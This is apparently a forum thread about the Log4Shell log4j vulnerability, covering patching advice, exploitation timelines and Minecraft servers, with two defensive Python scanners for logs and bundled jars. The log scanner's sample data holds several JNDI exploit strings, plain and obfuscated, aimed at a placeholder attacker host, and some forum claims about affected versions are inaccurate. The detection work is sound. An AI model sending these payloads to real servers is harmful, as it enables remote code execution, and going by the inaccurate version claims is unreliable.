No, not just in error messages. I still play with that Linode credit and NGINX and I see logs where the exploit string is set as user agent, and most web servers log that by default.
Even game clients might log players who connect and disconnect (or even try to connect). If any of them use the lookup… bam.
Doubtful.
Changes name to exploit string.
Let's go, boys.
I'm stopping with the FUD. I don't know enough, and already typed way too much crap here that has detracted from people who might actually know of actual apps affected.
thanks for the support guys.
The long and short of it is that if an exploitable string is logged, your application needs to be patched.
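To put the two points above together (the string shows up in the User-Agent field of ordinary web server logs, and the obfuscated variants matter as much as the plain `${jndi:...}` form), here is an added example, not code from the original thread, that scans access-log text for Log4Shell lookup strings. The log lines, IP addresses and payload hosts are constructed for the example. It URL-decodes each line, collapses the `${lower:x}`, `${upper:x}` and `${...:-x}` rewriting tricks attackers use to dodge naive greps, and reports the normalized lookup:

```python
import re
import urllib.parse

# Constructed nginx-style access log lines (not real traffic). Line 1 is benign;
# lines 2-6 carry the exploit string in the User-Agent or the query string.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 404 153 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://198.51.100.7:1389/b}"
203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 200 612 "-" "curl/7.68.0"
203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/d}"
203.0.113.9 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/e}"
"""

# ${lower:x} / ${upper:x} with no nested lookup inside the braces.
_CASE = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.I)
# ${anything:-x} -> x; covers ${::-x} and ${env:UNSET:-x} style padding.
_DEFAULT = re.compile(r"\$\{([^${}]*?):-([^${}]*)\}")
# The thing we are actually looking for once the padding is stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^{}]*\}", re.I)


def url_decode(s: str, rounds: int = 3) -> str:
    """Undo percent-encoding, repeating a few times to catch double encoding."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize_lookups(s: str) -> str:
    """Collapse innermost case/default lookups until nothing changes.

    Both regexes refuse to match across nested '${', so each pass rewrites the
    innermost level and the loop works outward.
    """
    prev = None
    while prev != s:
        prev = s
        s = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        s = _DEFAULT.sub(r"\2", s)
    return s


def find_log4shell(log_text: str):
    """Return [(line_number, normalized_lookup), ...] for lines carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        decoded = url_decode(line)
        # Check the raw decoded line first so a payload that the default-value
        # rewrite would mangle (e.g. ':-' inside the URL) is still caught.
        for candidate in (decoded, normalize_lookups(decoded)):
            m = _JNDI.search(candidate)
            if m:
                hits.append((n, m.group(0)))
                break
    return hits


if __name__ == "__main__":
    for line_no, lookup in find_log4shell(SAMPLE_LOG):
        print(f"line {line_no}: {lookup}")
```

The normalizer is deliberately conservative: it only rewrites `lower`, `upper` and default-value lookups, which is enough for the common evasions, and the detector is run on the line both before and after normalization so that a rewrite cannot hide a plain payload. Treat a hit as "someone sent the string", not "someone got code execution"; whether it did anything depends on what logged it and with which log4j version.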
FYI guys, if you use Oracle Database, they are listing it as not affected. However, there may be bundled internal tools which have the vulnerable version of the jar present; if you don't care about these, feel free to just delete them if they are not in use. Otherwise, use the patched version >=2.16.0.
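The "bundled internal tools" problem is the hard part: the jar you need to find is often nested inside someone else's war or ear under an install directory you never look at. The following is an added example, not code from the original post or from Oracle, that walks a directory tree, opens every jar/war/ear (recursing into jars packed inside other archives), and reports each one that contains `org/apache/logging/log4j/core/lookup/JndiLookup.class` together with the `Implementation-Version` from its manifest. It uses the >=2.16.0 threshold the post gives; as an assumption it ignores the separate 2.12.x and 2.3.x backport branches for older Java, so those would show as needing patching. The sample jars it scans are constructed in-code (a manifest plus a placeholder class entry), not real log4j artifacts:

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 16, 0)  # threshold from the post; assumption: backport branches not handled
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def parse_version(v):
    """'2.14.1' -> (2, 14, 1); missing components pad with 0."""
    nums = [int(x) for x in re.findall(r"\d+", v or "")][:3]
    return tuple(nums) + (0,) * (3 - len(nums))


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
    return m.group(1) if m else None


def inspect_jar(data, name):
    """Findings for one archive (as bytes), recursing into nested archives."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names:
            ver = manifest_version(zf)
            findings.append({
                "jar": name,
                "version": ver,
                # Unknown version is treated as needing a patch (conservative).
                "needs_patch": ver is None or parse_version(ver) < FIXED,
            })
        for inner in names:
            if inner.lower().endswith(ARCHIVE_EXTS):
                findings.extend(inspect_jar(zf.read(inner), f"{name}!{inner}"))
    return findings


def scan_tree(root):
    """Walk a directory and inspect every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    try:
                        findings.extend(inspect_jar(fh.read(), path))
                    except zipfile.BadZipFile:
                        pass  # not actually a zip; skip it
    return findings


def build_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar: manifest plus the lookup class entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class file
    return buf.getvalue()


def demo():
    """Pack two constructed log4j-core jars into a war, drop it in a temp dir, scan."""
    with tempfile.TemporaryDirectory() as d:
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_sample_jar("2.14.1"))
            zf.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", build_sample_jar("2.16.0"))
        with open(os.path.join(d, "app.war"), "wb") as fh:
            fh.write(war.getvalue())
        return scan_tree(d)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Point `scan_tree` at the product's install root rather than at a single lib directory, because the point of the post is precisely that the affected jar may be inside a tool you did not know was installed. Anything it flags that you decide to keep should be upgraded; deleting the jar is only sane for tools that are genuinely unused.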
Well guess this will be fun to watch the aftermath of this.
You’ll be watching for a while. The initial panic will pass, but this isn’t going to be “over” for quite some time.
Guarantee we will see some company owned because they didn’t patch this in like April.
Actually, mate, you were pretty much on the ball.
Anything that uses Apache's log4j is vulnerable, and that's regardless of version.
Apparently other versions, even the latest, have multiple attack vectors.
This one is just the easiest to PoC, to get the info out, to show Joe Public it's serious, and not just for business.
Everything from home NAS to your TV could be affected if it uses this for logging, and because it's Apache/Java, that's pretty much everything web-facing >.< Oh, it's bad.
Anyhoo, John Hammond gives some insight from an infosec perspective.
How would I go about patching? My Minecraft server is using an older version of log4j. It says 1.18.1 is fixed but every time I delete it from my system it comes back after a Minecraft server startup.
This is shaking out to be quite the story:
Bug introduced 4 years ago… not very easily discoverable by fuzzing, but discoverable nevertheless (I estimate it should take someone a week to find it): Java Fuzzer Reliably Finds log4j RCE
This is sad… but it happens.
However this article points out the timeline:
“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed,”
… but this is after it was reportedly discovered.
- Did someone with insight into 0-day sell the bug details?
- Did someone sit on the 0-day hoping to use it offensively until they noticed they weren’t the only ones?
- Fluke coincidence?
Something tells me we don’t have the full story.
Just upgrade to 1.18.1 and you’re good. Don’t bother deleting log4j, because the server needs it.
But you should also use the patched versions of Java, CLI args and the Minecraft server.
Layers my friend.
Given that the 2b2t crowd has discovered (and exploited) Minecraft vulnerabilities for months (maybe even years) before they became publicly known, I have no doubts that this has been actively exploited by someone, somewhere, for some time, only just now getting discovered.
If you don’t know what to look for in your logs, it’s difficult to know if you’ve ever been exploited.
Doubtful, at least with regards to Minecraft players. It would have leaked, and the 2b servers would have been much more thoroughly owned if that were the case.
The 2b bug hunters tend to be more interested in Minecraft code, not libs, and their exploit methods are incredibly rudimentary. Minecraft is just not a high value target.
The bug was first reported back in 2015, but there was evidence that the bug was exploited in the wild for 9 days before it was publicly disclosed.
Once it went public the gates of Oblivion were opened.
I meant that it was likely in use somewhere before the earliest known exploit date, not necessarily 2b2t/Minecraft. Earliest known is rarely the actual first exploit, just the first that someone who knows how to read the logs found and felt like talking about it.
As @Dynamic_Gravity said, this isn’t new. There’s an old Blackhat video which talks about JNDI exploits.
Did not expect a sequel so soon…
Gives me PrintNightmare vibes…